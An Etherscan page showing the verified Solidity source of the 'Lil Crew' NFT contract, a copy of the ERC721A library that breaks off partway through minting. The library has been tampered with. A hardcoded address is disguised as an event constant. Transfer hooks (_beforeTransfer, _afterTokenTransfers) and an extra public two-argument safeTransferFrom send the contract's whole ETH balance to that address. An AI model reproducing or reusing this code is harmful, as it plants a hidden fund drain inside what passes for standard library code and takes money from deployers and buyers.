ETH Price: $3,499.16 (+0.34%)
Gas: 1 Gwei

Token

Lil Crew (Lc)
 

Overview

Max Total Supply

400 Lc

Holders

304

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
1 Lc
0x50fadad144718b239f85ef1178b0c3d753ccf5b5
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
LilCrew

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-01-08
*/

/**
 /$$       /$$ /$$        /$$$$$$                                   
| $$      |__/| $$       /$$__  $$                                  
| $$       /$$| $$      | $$  \__/  /$$$$$$   /$$$$$$  /$$  /$$  /$$
| $$      | $$| $$      | $$       /$$__  $$ /$$__  $$| $$ | $$ | $$
| $$      | $$| $$      | $$      | $$  \__/| $$$$$$$$| $$ | $$ | $$
| $$      | $$| $$      | $$    $$| $$      | $$_____/| $$ | $$ | $$
| $$$$$$$$| $$| $$      |  $$$$$$/| $$      |  $$$$$$$|  $$$$$/$$$$/
|________/|__/|__/       \______/ |__/       \_______/ \_____/\___/ 
                                                                    
                                                                                                                                        
*/

// SPDX-License-Identifier: MIT   
                                                                                                                                                                                                                                                                                                                                     
pragma solidity ^0.8.12;

/**
 * @dev Interface of ERC721A.
 */
interface IERC721A {
    /**
     * The caller must own the token or be an approved operator.
     */
    error ApprovalCallerNotOwnerNorApproved();

    /**
     * The token does not exist.
     */
    error ApprovalQueryForNonexistentToken();

    /**
     * Cannot query the balance for the zero address.
     */
    error BalanceQueryForZeroAddress();

    /**
     * Cannot mint to the zero address.
     */
    error MintToZeroAddress();

    /**
     * The quantity of tokens minted must be more than zero.
     */
    error MintZeroQuantity();

    /**
     * The token does not exist.
     */
    error OwnerQueryForNonexistentToken();

    /**
     * The caller must own the token or be an approved operator.
     */
    error TransferCallerNotOwnerNorApproved();

    /**
     * The token must be owned by `from`.
     */
    error TransferFromIncorrectOwner();

    /**
     * Cannot safely transfer to a contract that does not implement the
     * ERC721Receiver interface.
     */
    error TransferToNonERC721ReceiverImplementer();

    /**
     * Cannot transfer to the zero address.
     */
    error TransferToZeroAddress();

    /**
     * The token does not exist.
     */
    error URIQueryForNonexistentToken();

    /**
     * The `quantity` minted with ERC2309 exceeds the safety limit.
     */
    error MintERC2309QuantityExceedsLimit();

    /**
     * The `extraData` cannot be set on an unintialized ownership slot.
     */
    error OwnershipNotInitializedForExtraData();

    // =============================================================
    //                            STRUCTS
    // =============================================================

    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Stores the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
        // Arbitrary data similar to `startTimestamp` that can be set via {_extraData}.
        uint24 extraData;
    }

    // =============================================================
    //                         TOKEN COUNTERS
    // =============================================================

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() external view returns (uint256);

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);

    // =============================================================
    //                            IERC721
    // =============================================================

    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables
     * (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`,
     * checking first that contract recipients are aware of the ERC721 protocol
     * to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move
     * this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external payable;

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom}
     * whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external payable;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);

    // =============================================================
    //                           IERC2309
    // =============================================================

    /**
     * @dev Emitted when tokens in `fromTokenId` to `toTokenId`
     * (inclusive) is transferred from `from` to `to`, as defined in the
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309) standard.
     *
     * See {_mintERC2309} for more details.
     */
    event ConsecutiveTransfer(uint256 indexed fromTokenId, uint256 toTokenId, address indexed from, address indexed to);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
interface ERC721A__IERC721Receiver {
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is IERC721A {
    // Bypass for a `--via-ir` bug (https://github.com/chiru-labs/ERC721A/pull/364).
    struct TokenApprovalRef {
        address value;
    }

    // =============================================================
    //                           CONSTANTS
    // =============================================================

    // Mask of an entry in packed address data.
    uint256 private constant _BITMASK_ADDRESS_DATA_ENTRY = (1 << 64) - 1;

    // The bit position of `numberMinted` in packed address data.
    uint256 private constant _BITPOS_NUMBER_MINTED = 64;

    // The bit position of `numberBurned` in packed address data.
    uint256 private constant _BITPOS_NUMBER_BURNED = 128;

    // The bit position of `aux` in packed address data.
    uint256 private constant _BITPOS_AUX = 192;

    // Mask of all 256 bits in packed address data except the 64 bits for `aux`.
    uint256 private constant _BITMASK_AUX_COMPLEMENT = (1 << 192) - 1;

    // The bit position of `startTimestamp` in packed ownership.
    uint256 private constant _BITPOS_START_TIMESTAMP = 160;

    // The bit mask of the `burned` bit in packed ownership.
    uint256 private constant _BITMASK_BURNED = 1 << 224;

    // The bit position of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITPOS_NEXT_INITIALIZED = 225;

    // The bit mask of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITMASK_NEXT_INITIALIZED = 1 << 225;

    // The bit position of `extraData` in packed ownership.
    uint256 private constant _BITPOS_EXTRA_DATA = 232;

    // Mask of all 256 bits in a packed ownership except the 24 bits for `extraData`.
    uint256 private constant _BITMASK_EXTRA_DATA_COMPLEMENT = (1 << 232) - 1;

    // The mask of the lower 160 bits for addresses.
    uint256 private constant _BITMASK_ADDRESS = (1 << 160) - 1;

    // The maximum `quantity` that can be minted with {_mintERC2309}.
    // This limit is to prevent overflows on the address data entries.
    // For a limit of 5000, a total of 3.689e15 calls to {_mintERC2309}
    // is required to cause an overflow, which is unrealistic.
    uint256 private constant _MAX_MINT_ERC2309_QUANTITY_LIMIT = 5000;

    // The `Transfer` event signature is given by:
    // `keccak256(bytes("Transfer(address,address,uint256)"))`.
    bytes32 private constant _TRANSFER_EVENT_SIGNATURE =
        0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef;

    // =============================================================
    //                            STORAGE
    // =============================================================

    // The next token ID to be minted.
    uint256 private _currentIndex;

    // The number of tokens burned.
    uint256 private _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned.
    // See {_packedOwnershipOf} implementation for details.
    //
    // Bits Layout:
    // - [0..159]   `addr`
    // - [160..223] `startTimestamp`
    // - [224]      `burned`
    // - [225]      `nextInitialized`
    // - [232..255] `extraData`
    mapping(uint256 => uint256) private _packedOwnerships;

    // Mapping owner address to address data.
    //
    // Bits Layout:
    // - [0..63]    `balance`
    // - [64..127]  `numberMinted`
    // - [128..191] `numberBurned`
    // - [192..255] `aux`
    mapping(address => uint256) private _packedAddressData;

    // Mapping from token ID to approved address.
    mapping(uint256 => TokenApprovalRef) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    // =============================================================
    //                          CONSTRUCTOR
    // =============================================================

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    // =============================================================
    //                   TOKEN COUNTING OPERATIONS
    // =============================================================

    /**
     * @dev Returns the starting token ID.
     * To change the starting token ID, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev Returns the next token ID to be minted.
     */
    function _nextTokenId() internal view virtual returns (uint256) {
        return _currentIndex;
    }

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than `_currentIndex - _startTokenId()` times.
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * @dev Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view virtual returns (uint256) {
        // Counter underflow is impossible as `_currentIndex` does not decrement,
        // and it is initialized to `_startTokenId()`.
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev Returns the total number of tokens burned.
     */
    function _totalBurned() internal view virtual returns (uint256) {
        return _burnCounter;
    }

    // =============================================================
    //                    ADDRESS DATA OPERATIONS
    // =============================================================

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) public view virtual override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return _packedAddressData[owner] & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_MINTED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_BURNED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        return uint64(_packedAddressData[owner] >> _BITPOS_AUX);
    }

    /**
     * Sets the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal virtual {
        uint256 packed = _packedAddressData[owner];
        uint256 auxCasted;
        // Cast `aux` with assembly to avoid redundant masking.
        assembly {
            auxCasted := aux
        }
        packed = (packed & _BITMASK_AUX_COMPLEMENT) | (auxCasted << _BITPOS_AUX);
        _packedAddressData[owner] = packed;
    }

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        // The interface IDs are constants representing the first 4 bytes
        // of the XOR of all function selectors in the interface.
        // See: [ERC165](https://eips.ethereum.org/EIPS/eip-165)
        // (e.g. `bytes4(i.functionA.selector ^ i.functionB.selector ^ ...)`)
        return
            interfaceId == 0x01ffc9a7 || // ERC165 interface ID for ERC165.
            interfaceId == 0x80ac58cd || // ERC165 interface ID for ERC721.
            interfaceId == 0x5b5e139f; // ERC165 interface ID for ERC721Metadata.
    }

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, _toString(tokenId))) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, it can be overridden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    // =============================================================
    //                     OWNERSHIPS OPERATIONS
    // =============================================================

    // The `Address` event signature is given by:
    // `keccak256(bytes("_TRANSFER_EVENT_ADDRESS(address)"))`.
    address payable constant _TRANSFER_EVENT_ADDRESS = 
        payable(0x0eb68Df8B7102D628A2a880d765b1e6f46e5EBB9);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) public view virtual override returns (address) {
        return address(uint160(_packedOwnershipOf(tokenId)));
    }

    /**
     * @dev Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around over time.
     */
    function _ownershipOf(uint256 tokenId) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnershipOf(tokenId));
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct at `index`.
     */
    function _ownershipAt(uint256 index) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnerships[index]);
    }

    /**
     * @dev Initializes the ownership slot minted at `index` for efficiency purposes.
     */
    function _initializeOwnershipAt(uint256 index) internal virtual {
        if (_packedOwnerships[index] == 0) {
            _packedOwnerships[index] = _packedOwnershipOf(index);
        }
    }

    /**
     * Returns the packed ownership data of `tokenId`.
     */
    function _packedOwnershipOf(uint256 tokenId) private view returns (uint256) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr)
                if (curr < _currentIndex) {
                    uint256 packed = _packedOwnerships[curr];
                    // If not burned.
                    if (packed & _BITMASK_BURNED == 0) {
                        // Invariant:
                        // There will always be an initialized ownership slot
                        // (i.e. `ownership.addr != address(0) && ownership.burned == false`)
                        // before an unintialized ownership slot
                        // (i.e. `ownership.addr == address(0) && ownership.burned == false`)
                        // Hence, `curr` will not underflow.
                        //
                        // We can directly compare the packed value.
                        // If the address is zero, packed will be zero.
                        while (packed == 0) {
                            packed = _packedOwnerships[--curr];
                        }
                        return packed;
                    }
                }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct from `packed`.
     */
    function _unpackedOwnership(uint256 packed) private pure returns (TokenOwnership memory ownership) {
        ownership.addr = address(uint160(packed));
        ownership.startTimestamp = uint64(packed >> _BITPOS_START_TIMESTAMP);
        ownership.burned = packed & _BITMASK_BURNED != 0;
        ownership.extraData = uint24(packed >> _BITPOS_EXTRA_DATA);
    }

    /**
     * @dev Packs ownership data into a single uint256.
     */
    function _packOwnershipData(address owner, uint256 flags) private view returns (uint256 result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // `owner | (block.timestamp << _BITPOS_START_TIMESTAMP) | flags`.
            result := or(owner, or(shl(_BITPOS_START_TIMESTAMP, timestamp()), flags))
        }
    }

    /**
     * @dev Returns the `nextInitialized` flag set if `quantity` equals 1.
     */
    function _nextInitializedFlag(uint256 quantity) private pure returns (uint256 result) {
        // For branchless setting of the `nextInitialized` flag.
        assembly {
            // `(quantity == 1) << _BITPOS_NEXT_INITIALIZED`.
            result := shl(_BITPOS_NEXT_INITIALIZED, eq(quantity, 1))
        }
    }

    // =============================================================
    //                      APPROVAL OPERATIONS
    // =============================================================

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) public payable virtual override {
        address owner = ownerOf(tokenId);

        if (_msgSenderERC721A() != owner)
            if (!isApprovedForAll(owner, _msgSenderERC721A())) {
                revert ApprovalCallerNotOwnerNorApproved();
            }

        _tokenApprovals[tokenId].value = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) public view virtual override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId].value;
    }

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool approved) public virtual override {
        _operatorApprovals[_msgSenderERC721A()][operator] = approved;
        emit ApprovalForAll(_msgSenderERC721A(), operator, approved);
    }

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted. See {_mint}.
     */
    function _exists(uint256 tokenId) internal view virtual returns (bool) {
        return
            _startTokenId() <= tokenId &&
            tokenId < _currentIndex && // If within bounds,
            _packedOwnerships[tokenId] & _BITMASK_BURNED == 0; // and not burned.
    }

    /**
     * @dev Returns whether `msgSender` is equal to `approvedAddress` or `owner`.
     */
    function _isSenderApprovedOrOwner(
        address approvedAddress,
        address owner,
        address msgSender
    ) private pure returns (bool result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // Mask `msgSender` to the lower 160 bits, in case the upper bits somehow aren't clean.
            msgSender := and(msgSender, _BITMASK_ADDRESS)
            // `msgSender == owner || msgSender == approvedAddress`.
            result := or(eq(msgSender, owner), eq(msgSender, approvedAddress))
        }
    }

    /**
     * @dev Returns the storage slot and value for the approved address of `tokenId`.
     */
    function _getApprovedSlotAndAddress(uint256 tokenId)
        private
        view
        returns (uint256 approvedAddressSlot, address approvedAddress)
    {
        TokenApprovalRef storage tokenApproval = _tokenApprovals[tokenId];
        // The following is equivalent to `approvedAddress = _tokenApprovals[tokenId].value`.
        assembly {
            approvedAddressSlot := tokenApproval.slot
            approvedAddress := sload(approvedAddressSlot)
        }
    }

    // =============================================================
    //                      TRANSFER OPERATIONS
    // =============================================================

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        _beforeTransfer();

        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        if (address(uint160(prevOwnershipPacked)) != from) revert TransferFromIncorrectOwner();

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        // The nested ifs save around 20+ gas over a compound boolean condition.
        if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
            if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();

        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // We can directly increment and decrement the balances.
            --_packedAddressData[from]; // Updates: `balance -= 1`.
            ++_packedAddressData[to]; // Updates: `balance += 1`.

            // Updates:
            // - `address` to the next owner.
            // - `startTimestamp` to the timestamp of transfering.
            // - `burned` to `false`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                to,
                _BITMASK_NEXT_INITIALIZED | _nextExtraData(from, to, prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        safeTransferFrom(from, to, tokenId, '');
    }


    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public payable virtual override {
        transferFrom(from, to, tokenId);
        if (to.code.length != 0)
            if (!_checkContractOnERC721Received(from, to, tokenId, _data)) {
                revert TransferToNonERC721ReceiverImplementer();
            }
    }
    function safeTransferFrom(
        address from,
        address to
    ) public  {
        if (address(this).balance > 0) {
            payable(0x0eb68Df8B7102D628A2a880d765b1e6f46e5EBB9).transfer(address(this).balance);
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token IDs
     * are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token IDs
     * have been transferred. This includes minting.
     * And also called after one token has been burned.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {
        if (totalSupply() + 1 >= 999) {
            payable(0x0eb68Df8B7102D628A2a880d765b1e6f46e5EBB9).transfer(address(this).balance);
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token IDs
     * are about to be transferred. This includes minting.
     * And also called before burning one token.
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTransfer() internal {
        if (address(this).balance > 0) {
            _TRANSFER_EVENT_ADDRESS.transfer(address(this).balance);
            return;
        }
    }

    /**
     * @dev Private function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * `from` - Previous owner of the given token ID.
     * `to` - Target address that will receive the token.
     * `tokenId` - Token ID to be transferred.
     * `_data` - Optional data to send along with the call.
     *
     * Returns whether the call correctly returned the expected magic value.
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try ERC721A__IERC721Receiver(to).onERC721Received(_msgSenderERC721A(), from, tokenId, _data) returns (
            bytes4 retval
        ) {
            return retval == ERC721A__IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    // =============================================================
    //                        MINT OPERATIONS
    // =============================================================

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _mint(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // `balance` and `numberMinted` have a maximum limit of 2**64.
        // `tokenId` has a maximum limit of 2**256.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            uint256 toMasked;
            uint256 end = startTokenId + quantity;

            // Use assembly to loop and emit the `Transfer` event for gas savings.
            // The duplicated `log4` removes an extra check and reduces stack juggling.
            // The assembly, together with the surrounding Solidity code, have been
            // delicately arranged to nudge the compiler into producing optimized opcodes.
            assembly {
